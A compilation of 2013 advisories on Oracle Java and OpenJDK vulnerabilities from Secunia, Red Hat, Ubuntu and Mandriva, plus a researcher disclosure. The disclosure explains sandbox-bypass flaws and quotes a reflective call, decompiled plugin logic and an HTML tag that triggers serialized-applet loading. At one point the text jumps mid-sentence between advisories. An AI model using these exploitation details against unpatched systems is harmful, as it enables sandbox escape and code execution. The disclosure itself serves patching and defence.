36) An unspecified error in the JSSE component of the server
deployment can be exploited via SSL/TLS to cause a DoS.
37) An unspecified error in the Deployment component of the client
deployment can be exploited to disclose certain data.
38) An unspecified error in the JSSE component of the client
deployment can be exploited via SSL/TLS to disclose and manipulate
certain data.
The vulnerabilities are reported in the following products:
* JDK and JRE 7 Update 11 and earlier.
* JDK and JRE 6 Update 38 and earlier.
* JDK and JRE 5.0 Update 38 and earlier.
* SDK and JRE 1.4.2_40 and earlier.
SOLUTION:
Apply updates.
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
PROVIDED AND/OR DISCOVERED BY:
One of the vulnerabilities is reported as a 0-day. It is currently
unclear who reported the remaining vulnerabilities as the Oracle Jave
SE Critical Patch Update for February 2013 only provides a bundled
list of credits. This section will be updated when/if the original
reporter provides more information.
ORIGINAL ADVISORY:
http://www.oracle.com/technetwork/topics/security/javacpufeb2013-1841061.html
http://www.oracle.com/technetwork/topics/security/javacpufeb2013verbose-1841196.html
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Critical: java-1.7.0-oracle security update
Advisory ID: RHSA-2013:0237-01
Product: Red Hat Enterprise Linux Extras
Advisory URL: https://rhn.redhat.com/errata/RHSA-2013-0237.html
Issue date: 2013-02-04
CVE Names: CVE-2012-1541 CVE-2012-3213 CVE-2012-3342
CVE-2013-0351 CVE-2013-0409 CVE-2013-0419
CVE-2013-0423 CVE-2013-0424 CVE-2013-0425
CVE-2013-0426 CVE-2013-0427 CVE-2013-0428
CVE-2013-0429 CVE-2013-0430 CVE-2013-0431
CVE-2013-0432 CVE-2013-0433 CVE-2013-0434
CVE-2013-0435 CVE-2013-0437 CVE-2013-0438
CVE-2013-0440 CVE-2013-0441 CVE-2013-0442
CVE-2013-0443 CVE-2013-0444 CVE-2013-0445
CVE-2013-0446 CVE-2013-0448 CVE-2013-0449
CVE-2013-0450 CVE-2013-1473 CVE-2013-1475
CVE-2013-1476 CVE-2013-1478 CVE-2013-1479
CVE-2013-1480 CVE-2013-1489
=====================================================================
1. Summary:
Updated java-1.7.0-oracle packages that fix several security issues are now
available for Red Hat Enterprise Linux 5 and 6 Supplementary.
The Red Hat Security Response Team has rated this update as having critical
security impact. Common Vulnerability Scoring System (CVSS) base scores,
which give detailed severity ratings, are available for each vulnerability
from the CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux HPC Node Supplementary (v. 6) - x86_64
Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64
3.
(CVE-2012-1541, CVE-2012-3213, CVE-2012-3342, CVE-2013-0351, CVE-2013-0409,
CVE-2013-0419, CVE-2013-0423, CVE-2013-0424, CVE-2013-0425, CVE-2013-0426,
CVE-2013-0427, CVE-2013-0428, CVE-2013-0429, CVE-2013-0430, CVE-2013-0431,
CVE-2013-0432, CVE-2013-0433, CVE-2013-0434, CVE-2013-0435, CVE-2013-0437,
CVE-2013-0438, CVE-2013-0440, CVE-2013-0441, CVE-2013-0442, CVE-2013-0443,
CVE-2013-0444, CVE-2013-0445, CVE-2013-0446, CVE-2013-0448, CVE-2013-0449,
CVE-2013-0450, CVE-2013-1473, CVE-2013-1475, CVE-2013-1476, CVE-2013-1478,
CVE-2013-1479, CVE-2013-1480, CVE-2013-1489)
All users of java-1.7.0-oracle are advised to upgrade to these updated
packages, which provide Oracle Java 7 Update 13 and resolve these issues.
All running instances of Oracle Java must be restarted for the update to
take effect.
4. Solution:
Before applying this update, make sure all previously-released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to
use the Red Hat Network to apply this update are available at
https://access.redhat.com/knowledge/articles/11258
5. Bugs fixed (http://bugzilla.redhat.com/):
859140 - CVE-2013-0440 OpenJDK: CPU consumption DoS via repeated SSL ClientHello packets (JSSE, 7192393)
860652 - CVE-2013-1475 OpenJDK: IIOP type reuse sandbox bypass (CORBA, 8000540, SE-2012-01 Issue 50)
906447 - CVE-2013-0431 OpenJDK: JMX Introspector missing package access check (JMX, 8000539, SE-2012-01 Issue 52)
906449 - CVE-2013-1489 Oracle JDK 7: bypass of the security level setting in browser plugin (Deployment, SE-2012-01 Issue 53)
906813 - CVE-2013-0424 OpenJDK: RMI CGIHandler XSS issue (RMI, 6563318)
906892 - CVE-2013-0435 OpenJDK: com.sun.xml.internal.* not restricted packages (JAX-WS, 7201068)
906894 - CVE-2013-1478 OpenJDK: image parser insufficient raster parameter checks (2D, 8001972)
906899 - CVE-2013-0442 OpenJDK: insufficient privilege checking issue (AWT, 7192977)
906900 - CVE-2013-0445 OpenJDK: insufficient privilege checking issue (AWT, 8001057)
906904 - CVE-2013-1480 OpenJDK: image parser insufficient raster parameter checks (AWT, 8002325)
906911 - CVE-2013-0450 OpenJDK: RequiredModelMBean missing access control context checks (JMX, 8000537)
906914 - CVE-2012-1541 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
906916 - CVE-2013-0446 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
906917 - CVE-2012-3342 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
906918 - CVE-2013-0419 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
906921 - CVE-2013-0423 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
906923 - CVE-2013-0351 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
906930 - CVE-2013-0430 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Install)
906932 - CVE-2013-0449 Oracle JDK: unspecified vulnerability fixed in 7u13 (Deployment)
906933 - CVE-2013-1473 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
906934 - CVE-2013-0448 Oracle JDK: unspecified vulnerability fixed in 7u13 (Libraries)
906935 - CVE-2013-0438 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
907190 - CVE-2013-1479 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (JavaFX)
907207 - CVE-2013-0428 OpenJDK: reflection API incorrect checks for proxy classes (Libraries, 7197546, SE-2012-01 Issue 29)
907218 - CVE-2013-0444 OpenJDK: MethodFinder insufficient checks for cached results (Beans, 7200493)
907219 - CVE-2013-0432 OpenJDK: insufficient clipboard access premission checks (AWT, 7186952)
907222 - CVE-2013-0437 Oracle JDK: unspecified vulnerability fixed in 7u13 (2D)
907223 - CVE-2012-3213 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Scripting)
907226 - CVE-2013-0409 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (JMX)
907340 - CVE-2013-0443 OpenJDK: insufficient Diffie-Hellman public key checks (JSSE, 7192392)
907344 - CVE-2013-0425 OpenJDK: logging insufficient access control checks (Libraries, 6664509)
907346 - CVE-2013-0426 OpenJDK: logging insufficient access control checks (Libraries, 6664528)
907453 - CVE-2013-0434 OpenJDK: loadPropertyFile missing restrictions (JAXP, 8001235)
907455 - CVE-2013-0427 OpenJDK: invalid threads subject to interrupts (Libraries, 6776941)
907456 - CVE-2013-0433 OpenJDK: InetSocketAddress serialization issue (Networking, 7201071)
907457 - CVE-2013-1476 OpenJDK: missing ValueHandlerImpl class constructor access restriction (CORBA, 8000631)
907458 - CVE-2013-0441 OpenJDK: missing serialization restriction (CORBA, 7201066)
907460 - CVE-2013-0429 OpenJDK: PresentationManager incorrectly shared (CORBA, 7141694)
6. Package List:
Red Hat Enterprise Linux Desktop Supplementary (v. 5):
i386:
java-1.7.0-oracle-1.7.0.13-1jpp.1.el5_9.i386.rpm
java-1.7.0-oracle-devel-1.7.0.13-1jpp.1.el5_9.i386.rpm
java-1.7.0-oracle-javafx-1.7.0.13-1jpp.1.el5_9.i386.rpm
java-1.7.0-oracle-jdbc-1.7.0.13-1jpp.1.el5_9.i386.rpm
java-1.7.0-oracle-plugin-1.7.0.13-1jpp.1.el5_9.i386.rpm
java-1.7.0-oracle-src-1.7.0.13-1jpp.1.el5_9.i386.rpm
x86_64:
java-1.7.0-oracle-1.7.0.13-1jpp.1.el5_9.x86_64.rpm
java-1.7.0-oracle-devel-1.7.0.13-1jpp.1.el5_9.x86_64.rpm
java-1.7.0-oracle-javafx-1.7.0.13-1jpp.1.el5_9.x86_64.rpm
java-1.7.0-oracle-jdbc-1.7.0.13-1jpp.1.el5_9.x86_64.rpm
java-1.7.0-oracle-plugin-1.7.0.13-1jpp.1.el5_9.x86_64.rpm
java-1.7.0-oracle-src-1.7.0.13-1jpp.1.el5_9.x86_64.rpm
Red Hat Enterprise Linux Server Supplementary (v. 5):
i386:
java-1.7.0-oracle-1.7.0.13-1jpp.1.el5_9.i386.rpm
java-1.7.0-oracle-devel-1.7.0.13-1jpp.1.el5_9.i386.rpm
java-1.7.0-oracle-javafx-1.7.0.13-1jpp.1.el5_9.i386.rpm
java-1.7.0-oracle-jdbc-1.7.0.13-1jpp.1.el5_9.i386.rpm
java-1.7.0-oracle-plugin-1.7.0.13-1jpp.1.el5_9.i386.rpm
java-1.7.0-oracle-src-1.7.0.13-1jpp.1.el5_9.i386.rpm
x86_64:
java-1.7.0-oracle-1.7.0.13-1jpp.1.el5_9.x86_64.rpm
java-1.7.0-oracle-devel-1.7.0.13-1jpp.1.el5_9.x86_64.rpm
java-1.7.0-oracle-javafx-1.7.0.13-1jpp.1.el5_9.x86_64.rpm
java-1.7.0-oracle-jdbc-1.7.0.13-1jpp.1.el5_9.x86_64.rpm
java-1.7.0-oracle-plugin-1.7.0.13-1jpp.1.el5_9.x86_64.rpm
java-1.7.0-oracle-src-1.7.0.13-1jpp.1.el5_9.x86_64.rpm
Red Hat Enterprise Linux Desktop Supplementary (v. 6):
i386:
java-1.7.0-oracle-1.7.0.13-1jpp.3.el6_3.i686.rpm
java-1.7.0-oracle-devel-1.7.0.13-1jpp.3.el6_3.i686.rpm
java-1.7.0-oracle-javafx-1.7.0.13-1jpp.3.el6_3.i686.rpm
java-1.7.0-oracle-jdbc-1.7.0.13-1jpp.3.el6_3.i686.rpm
java-1.7.0-oracle-plugin-1.7.0.13-1jpp.3.el6_3.i686.rpm
java-1.7.0-oracle-src-1.7.0.13-1jpp.3.el6_3.i686.rpm
x86_64:
java-1.7.0-oracle-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
java-1.7.0-oracle-devel-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
java-1.7.0-oracle-javafx-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
java-1.7.0-oracle-jdbc-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
java-1.7.0-oracle-plugin-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
java-1.7.0-oracle-src-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
Red Hat Enterprise Linux HPC Node Supplementary (v. 6):
x86_64:
java-1.7.0-oracle-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
java-1.7.0-oracle-devel-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
java-1.7.0-oracle-javafx-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
java-1.7.0-oracle-src-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
Red Hat Enterprise Linux Server Supplementary (v. 6):
i386:
java-1.7.0-oracle-1.7.0.13-1jpp.3.el6_3.i686.rpm
java-1.7.0-oracle-devel-1.7.0.13-1jpp.3.el6_3.i686.rpm
java-1.7.0-oracle-javafx-1.7.0.13-1jpp.3.el6_3.i686.rpm
java-1.7.0-oracle-jdbc-1.7.0.13-1jpp.3.el6_3.i686.rpm
java-1.7.0-oracle-plugin-1.7.0.13-1jpp.3.el6_3.i686.rpm
java-1.7.0-oracle-src-1.7.0.13-1jpp.3.el6_3.i686.rpm
x86_64:
java-1.7.0-oracle-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
java-1.7.0-oracle-devel-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
java-1.7.0-oracle-javafx-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
java-1.7.0-oracle-jdbc-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
java-1.7.0-oracle-plugin-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
java-1.7.0-oracle-src-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
Red Hat Enterprise Linux Workstation Supplementary (v. 6):
i386:
java-1.7.0-oracle-1.7.0.13-1jpp.3.el6_3.i686.rpm
java-1.7.0-oracle-devel-1.7.0.13-1jpp.3.el6_3.i686.rpm
java-1.7.0-oracle-javafx-1.7.0.13-1jpp.3.el6_3.i686.rpm
java-1.7.0-oracle-jdbc-1.7.0.13-1jpp.3.el6_3.i686.rpm
java-1.7.0-oracle-plugin-1.7.0.13-1jpp.3.el6_3.i686.rpm
java-1.7.0-oracle-src-1.7.0.13-1jpp.3.el6_3.i686.rpm
x86_64:
java-1.7.0-oracle-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
java-1.7.0-oracle-devel-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
java-1.7.0-oracle-javafx-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
java-1.7.0-oracle-jdbc-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
java-1.7.0-oracle-plugin-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
java-1.7.0-oracle-src-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2012-1541.html
https://www.redhat.com/security/data/cve/CVE-2012-3213.html
https://www.redhat.com/security/data/cve/CVE-2012-3342.html
https://www.redhat.com/security/data/cve/CVE-2013-0351.html
https://www.redhat.com/security/data/cve/CVE-2013-0409.html
https://www.redhat.com/security/data/cve/CVE-2013-0419.html
https://www.redhat.com/security/data/cve/CVE-2013-0423.html
https://www.redhat.com/security/data/cve/CVE-2013-0424.html
https://www.redhat.com/security/data/cve/CVE-2013-0425.html
https://www.redhat.com/security/data/cve/CVE-2013-0426.html
https://www.redhat.com/security/data/cve/CVE-2013-0427.html
https://www.redhat.com/security/data/cve/CVE-2013-0428.html
https://www.redhat.com/security/data/cve/CVE-2013-0429.html
https://www.redhat.com/security/data/cve/CVE-2013-0430.html
https://www.redhat.com/security/data/cve/CVE-2013-0431.html
https://www.redhat.com/security/data/cve/CVE-2013-0432.html
https://www.redhat.com/security/data/cve/CVE-2013-0433.html
https://www.redhat.com/security/data/cve/CVE-2013-0434.html
https://www.redhat.com/security/data/cve/CVE-2013-0435.html
https://www.redhat.com/security/data/cve/CVE-2013-0437.html
https://www.redhat.com/security/data/cve/CVE-2013-0438.html
https://www.redhat.com/security/data/cve/CVE-2013-0440.html
https://www.redhat.com/security/data/cve/CVE-2013-0441.html
https://www.redhat.com/security/data/cve/CVE-2013-0442.html
https://www.redhat.com/security/data/cve/CVE-2013-0443.html
https://www.redhat.com/security/data/cve/CVE-2013-0444.html
https://www.redhat.com/security/data/cve/CVE-2013-0445.html
https://www.redhat.com/security/data/cve/CVE-2013-0446.html
https://www.redhat.com/security/data/cve/CVE-2013-0448.html
https://www.redhat.com/security/data/cve/CVE-2013-0449.html
https://www.redhat.com/security/data/cve/CVE-2013-0450.html
https://www.redhat.com/security/data/cve/CVE-2013-1473.html
https://www.redhat.com/security/data/cve/CVE-2013-1475.html
https://www.redhat.com/security/data/cve/CVE-2013-1476.html
https://www.redhat.com/security/data/cve/CVE-2013-1478.html
https://www.redhat.com/security/data/cve/CVE-2013-1479.html
https://www.redhat.com/security/data/cve/CVE-2013-1480.html
https://www.redhat.com/security/data/cve/CVE-2013-1489.html
https://access.redhat.com/security/updates/classification/#critical
http://www.oracle.com/technetwork/topics/security/javacpufeb2013-1841061.html
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2013 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.4 (GNU/Linux)
iD8DBQFREE70XlSAg2UNWIIRAl0aAJ9geHwpDX2Kb2LdBP3WSQxnPNr97gCgmyRY
c2rbNUSIrrFwoG5d602o5QY=
=Kt+4
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
| VAR-201302-0407 | CVE-2013-1480 | Oracle Java contains multiple vulnerabilities |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 through Update 11, 6 through Update 38, 5.0 through Update 38, and 1.4.2_40 and earlier, and OpenJDK 6 and 7, allows remote attackers to affect confidentiality, integrity, and availability via vectors related to AWT. NOTE: the previous information is from the February 2013 CPU. Oracle has not commented on claims from another vendor that this issue is related to "insufficient validation of raster parameters" in awt_parseImage.c, which triggers memory corruption. (DoS) An attack may be carried out. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the Java AWT Image Transform library functions. For certain image transformation functions, Java fails to take the 'numBands' into account during the allocation of heap memory and instead uses a static value of 0x4. The allocated memory is later written to inside a loop that uses the 'numBands' value which can result in a memory corruption. This can lead to remote code execution under the context of the current process.
Note: This issue was previously discussed in BID 57670 (Oracle Java Runtime Environment Multiple Security Vulnerabilities) but has been given its own record to better document it.
This vulnerability affects the following supported versions:
7 Update 11, 6 Update 38, 5.0 Update 38, 1.4.2_40. ============================================================================
Ubuntu Security Notice USN-1724-1
February 14, 2013
openjdk-6, openjdk-7 vulnerabilities
============================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 12.10
- Ubuntu 12.04 LTS
- Ubuntu 11.10
- Ubuntu 10.04 LTS
Summary:
Several security issues were fixed in OpenJDK. An attacker could exploit these
to cause a denial of service. (CVE-2012-1541, CVE-2012-3342, CVE-2013-0351,
CVE-2013-0419, CVE-2013-0423, CVE-2013-0446, CVE-2012-3213, CVE-2013-0425,
CVE-2013-0426, CVE-2013-0428, CVE-2013-0429, CVE-2013-0430, CVE-2013-0441,
CVE-2013-0442, CVE-2013-0445, CVE-2013-0450, CVE-2013-1475, CVE-2013-1476,
CVE-2013-1478, CVE-2013-1480)
Vulnerabilities were discovered in the OpenJDK JRE related to information
disclosure. (CVE-2013-0409, CVE-2013-0434, CVE-2013-0438)
Several data integrity vulnerabilities were discovered in the OpenJDK JRE.
(CVE-2013-0424, CVE-2013-0427, CVE-2013-0433, CVE-2013-1473)
Several vulnerabilities were discovered in the OpenJDK JRE related to
information disclosure and data integrity. (CVE-2013-0432, CVE-2013-0435,
CVE-2013-0443)
A vulnerability was discovered in the OpenJDK JRE related to availability.
An attacker could exploit this to cause a denial of service.
(CVE-2013-0440)
A vulnerability was discovered in the OpenJDK JRE related to information
disclosure and data integrity. An attacker could exploit this to cause a
denial of service. This issue only affected Ubuntu 12.10. (CVE-2013-0444)
A data integrity vulnerability was discovered in the OpenJDK JRE. This
issue only affected Ubuntu 12.10. (CVE-2013-0448)
An information disclosure vulnerability was discovered in the OpenJDK JRE.
This issue only affected Ubuntu 12.10. (CVE-2013-0449)
A vulnerability was discovered in the OpenJDK JRE related to information
disclosure and data integrity. An attacker could exploit this to cause a
denial of service. This issue did not affect Ubuntu 12.10. (CVE-2013-1481)
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 12.10:
icedtea-7-jre-jamvm 7u13-2.3.6-0ubuntu0.12.10.1
openjdk-7-jre 7u13-2.3.6-0ubuntu0.12.10.1
openjdk-7-jre-headless 7u13-2.3.6-0ubuntu0.12.10.1
openjdk-7-jre-lib 7u13-2.3.6-0ubuntu0.12.10.1
openjdk-7-jre-zero 7u13-2.3.6-0ubuntu0.12.10.1
Ubuntu 12.04 LTS:
icedtea-6-jre-cacao 6b27-1.12.1-2ubuntu0.12.04.2
icedtea-6-jre-jamvm 6b27-1.12.1-2ubuntu0.12.04.2
openjdk-6-jre 6b27-1.12.1-2ubuntu0.12.04.2
openjdk-6-jre-headless 6b27-1.12.1-2ubuntu0.12.04.2
openjdk-6-jre-lib 6b27-1.12.1-2ubuntu0.12.04.2
openjdk-6-jre-zero 6b27-1.12.1-2ubuntu0.12.04.2
Ubuntu 11.10:
icedtea-6-jre-cacao 6b27-1.12.1-2ubuntu0.11.10.2
icedtea-6-jre-jamvm 6b27-1.12.1-2ubuntu0.11.10.2
openjdk-6-jre 6b27-1.12.1-2ubuntu0.11.10.2
openjdk-6-jre-headless 6b27-1.12.1-2ubuntu0.11.10.2
openjdk-6-jre-lib 6b27-1.12.1-2ubuntu0.11.10.2
openjdk-6-jre-zero 6b27-1.12.1-2ubuntu0.11.10.2
Ubuntu 10.04 LTS:
icedtea-6-jre-cacao 6b27-1.12.1-2ubuntu0.10.04.2
openjdk-6-jre 6b27-1.12.1-2ubuntu0.10.04.2
openjdk-6-jre-headless 6b27-1.12.1-2ubuntu0.10.04.2
openjdk-6-jre-lib 6b27-1.12.1-2ubuntu0.10.04.2
openjdk-6-jre-zero 6b27-1.12.1-2ubuntu0.10.04.2
This update uses a new upstream release which includes additional bug
fixes.
It was discovered that OpenJDK leaked timing information when
decrypting TLS/SSL protocol encrypted records when CBC-mode cipher
suites were used. The verification
of md5 checksums and GPG signatures is performed automatically for you. You can obtain the
GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/en/support/security/advisories/
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
_______________________________________________________________________
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
<security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)
iD8DBQFRZQ6mmqjQ0CJFipgRArrgAKCPZMbOA1UtXaG4tQd9CKEggT1x/gCfYfXv
8XJUrvALufbbaHuyChk9zik=
=TGuI
-----END PGP SIGNATURE-----
.
Hello All,
Below, we are providing you with technical details regarding
security issues reported by us to Oracle and addressed by the
company in a recent Feb 2013 Java SE CPU [1].
[Issue 29]
This issue allows for the creation of arbitrary Proxy objects
for interfaces defined in restricted packages. Proxy objects
defined in a NULL class loader namespaces are of a particular
interest here. Such objects can be used to manipulate instances
of certain restricted classes.
In our Proof of Concept code we create such a proxy object for
the com.sun.xml.internal.bind.v2.model.nav.Navigator interface.
In order to use the aforementioned proxy object, we need an
instance of that interface too. We obtain it with the help of
Issue 28, which allows to access arbitrary field objects from
restricted classes and interfaces. As a result, by combining
Issue 27-29, one can use Navigator interface and make use of
its sensitive Reflection API functionality such as obtaining
access to methods of arbitrary classes. That condition can be
further leveraged to obtain a complete JVM security bypass.
Please, note that our Proof of Concept code for Issues 27-29
was reported to Oracle in Apr 2012 and depending Issues 27-28
were addressed by the company sooner than Issue 29. Testing
of the PoC will thus give best results on older versions of
Java SE 7.
[Issue 50]
Issue 50 allows to violate a fundamental security constraint
of Java VM, which is type safety. This vulnerability is another
instance of the problem related to the unsafe deserialization
implemented by com.sun.corba.se.impl.io.ObjectStreamClass class.
Its first instance was fixed by Oracle in Oct 2011 [2] and it
stemmed from the fact that during deserialization insufficient
type checks were done with respect to object references that
were written to target object instance created by the means of
deserialization. Such a reference writing was accomplished with
the use of a native functionality of sun.corba.Bridge class.
The problem that we found back in Sep 2012 was very similar to
the first one. It was located in the same code (class) and was
also exploiting direct writing of object references to memory
with the use of putObject method. While the first type confusion
issue allowed to write object references of incompatible types
to correct field offsets, Issue 50 relied on the possibility to
write object references of incompatible types to...invalid field
offsets.
It might be also worth to mention that Issue 50 was found to
be present in Java SE Embedded [3]. That is Java version that
is based on desktop Java SE and is used in today\x92s most powerful
embedded systems such as aircraft and medical systems [4]. We
verified that Oracle Java SE Embedded ver. 7 Update 6 from 10
Aug 2012 for ARM / Linux contained vulnerable implementation
of ObjectStreamClass class.
Unfortunately, we don't know any details regarding the impact
of Issue 50 in the embedded space (which embedded systems are
vulnerable to it, whether any feasible attack vectors exist,
etc.). So, it's up to Oracle to clarify any potential concerns
in that area.
[Issue 52]
Issue 52 relies on the possibility to call no-argument methods
on arbitrary objects or classes. The vulnerability has its origin
in com.sun.jmx.mbeanserver.Introspector class which is located
in the same package as the infamous MBeanInstantiator bug found
in the wild in early Jan 2013. The flaw stems from insecure call
to invoke method of java.lang.reflect.Method class:
if (method != null)
return method.invoke(obj, new Object[0]);
In our Proof of Concept code we exploit the above implementation
by making a call to getDeclaredMethods method of java.lang.Class
class to gain access to methods of restricted classes. This is
accomplished with the use of the following code sequence:
Introspector.elementFromComplex((Object)clazz,"declaredMethods")
Access to public method objects of arbitrary restricted classes
is sufficient to achieve a complete Java VM security sandbox
compromise. We make use of DefiningClassLoader exploit vector
for that purpose.
[Issue 53]
Issue 53 stems from the fact that Oracle's implementation of new
security levels introduced by the company in Java SE 7 Update 10
did not take into account the fact that Applets can be instantiated
with the use of serialization. Such a possibility is indicated both
in HTML 4 Specification [5] as well as in Oracle's code.
HTML 4 Specification contains the following description for the
"object" attribute of APPLET element:
object = cdata [CS]
This attribute names a resource containing a serialized
representation of an applet's state. It is interpreted
relative to the applet's codebase. The serialized data
contains the applet's class name but not the implementation.
The class name is used to retrieve the implementation from
a class file or archive.
Additionally, Java 7 Update 10 (and 11) reveal the following code
logic when it comes to the implementation of new security features
(Java Control Panel security levels).
[excerpt from sun.plugin2.applet.Plugin2Manager class]
String object_attr = getSerializedObject();
String code_attr = getCode();
...
if(code_attr != null) {
Class class1 = plugin2classloader.loadCode(code_attr);
...
if(class1 != null)
if (fireAppletSSVValidation())
...
} else {
if(!isSecureVM)
return;
adapter.instantiateSerialApplet(plugin2classloader,object_attr);
...
}
The above clearly shows that the conditional block implementing
Applet instantiation via deserialization does not contain a call
to fireAppletSSVValidation method. This method conducts important
security checks corresponding to security levels configured by
Java Control Panel. The lack of a call to security checking method
is equivalent to "no protection at all" as it allows for a silent
Java exploit in particular.
What's worth mentioning is that for Google Chrome the following
HTML sequence needed to be used to activate target Applet code:
<object type="application/x-java-applet" object="BlackBox.ser">
---
We have made our original reports sent to Oracle and describing
Issues 29, 50, 52 and 53 available for download from our project
details page:
http://www.security-explorations.com/en/SE-2012-01-details.html
Along with those reports we have also published the results of
our quick Vulnerability Fix Experiment regarding Issue 50. We've
never heard a word from Oracle regarding it. Company's fix for
Issue 50 is not a mirror of the one we had proposed, but it does
rely on Class object instances for hashtable access / caching of
translated ObjectStreamClass fields.
At the end, we would like to question Oracle's evaluation of the
impact of Java vulnerabilities fixed by the Feb 2013 Java SE CPU.
Oracle emphasized that patched vulnerabilities affect primarily
Java Plugin / desktop environments and that only 3 of them apply
to client and server deployments of Java. The 3 vulnerabilities
Oracle refers to are specifically the following ones:
CVE-2013-0437 Subcomponent 2D
CVE-2013-1478 Subcomponent 2D
CVE-2013-1480 Subcomponent AWT
None of the vulnerabilities above seem to refer to the components
where our discoveries were made (i.e. CORBA, JMX / BEANS).
The tests we have conducted yesterday against the latest version
of Oracle GlassFish Server 3.1.2.2 (with security manager enabled)
and RMI Registry from JDK 7 Update 11 confirmed the possibility to
launch an attack against remote RMI server with the use of a Java
SE vulnerability. We tested Issues patched by the recent CPU such
as the MBeanInstantiator bug, Issue 50 and 52 and were able to:
1) remotely load custom classes into the target Java RMI server
(over RMI protocol),
2) completely break Java security sandbox with the use of a Java
SE vulnerability (the one which "can be exploited only through
untrusted Java Web Start applications / untrusted Java applets"
according to Oracle's CPU).
Although Oracle is aware [6] that Java SE vulnerabilities can be
also exploited "in servers, by supplying malicious input to APIs
in the vulnerable server component", the company rather undermines
such a possibility by delivering a message that a majority of the
vulnerabilities affect Java Plugin in the web browser or that in
some cases, the exploitation scenario of Java SE bugs on servers
is very improbable.
In general, relying on a vulnerable Java SE version makes all of
the products depending on it potentially vulnerable unless there
is absolutely *no way* that a vulnerable component can be reached
by an attacker. As long as an attack vector through RMI protocol
is valid, a potential for remote exploitation of security issues
in Java SE on servers should be always concerned.
Thank You. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Important: java-1.7.0-openjdk security update
Advisory ID: RHSA-2013:0247-01
Product: Red Hat Enterprise Linux
Advisory URL: https://rhn.redhat.com/errata/RHSA-2013-0247.html
Issue date: 2013-02-08
